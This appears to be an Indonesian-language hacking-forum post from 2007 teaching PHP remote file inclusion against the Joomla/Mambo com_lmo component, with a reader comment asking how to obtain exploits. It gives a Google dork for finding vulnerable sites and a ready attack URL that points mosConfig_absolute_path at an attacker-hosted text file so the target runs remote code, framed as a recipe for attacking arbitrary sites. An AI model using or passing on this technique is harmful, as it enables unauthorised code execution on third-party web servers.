|
|
|
|
Online Now: 3 0 Members | 3 Guests |
|
|
|
|
|
|
Copy & paste Coding Dibawah ini Untuk Banner kami ================================== <a href="http://www.sekuritionline.net/" target="_blank"><img src= "http://www.sekuritionline.net/ banner/banner.gif" width="125" height="75" alt="sekuritionline.net" title="SO-Te@m" border="0" /></a> |
|
|
|
|
|
|
| -------------------------------- |
|
|
|
|
|
|
|
| January 26, 2009, 5:53 pm |
|
|
|
|
By k0il
Published: November 15, 2007
Print
Email
secreet of php injection... sering kali saya mendengar bagaimana sih
php injection itu.... sebagai contoh saya ambil bug dari
http://milw0rm.com/exploits/2092 dengan isi yang kurang lebih seperti
ini dork: "com_lmo"
http://www.vuln.com/components/com_lmo/lmo.php?mosConfig_absolute_path=[evilcode]
di situ ditulisakan Dork:'com_lmo" yang di maksud dork disitu adalah
keyword pencarian pada google. pada search enggine kita ketikan
inurl:"com_lmo" setelah itu baru kita cari file nya satu persatu
setelah ketemu Url target kemudian kita ganti url belakang dengan
hosting tempat kita menyimpan evilcode sebagai contoh :
http://deatonco.com/cyber/k0il.txt jadi nanti url nya akan jadi seperti
ini http://www.vuln.com/components/com_lmo/
lmo.php?mosConfig_absolute_path=http://deatonco.com/cyber/k0il.txt??
dan jangan lupa pada webbrowser kita tambahin dengan tanda tanya....
mudah mudahan bermanfaat
View Comments (1)
|
|
|
|
|
Salam Hrmt sya KK K0il,
Klw bisa bgmna dunk cranya dpt exploit itu,pki xsmee atau sql.xpi...bngung nich, Pencerahannya ya KK k0il
-=spykid=-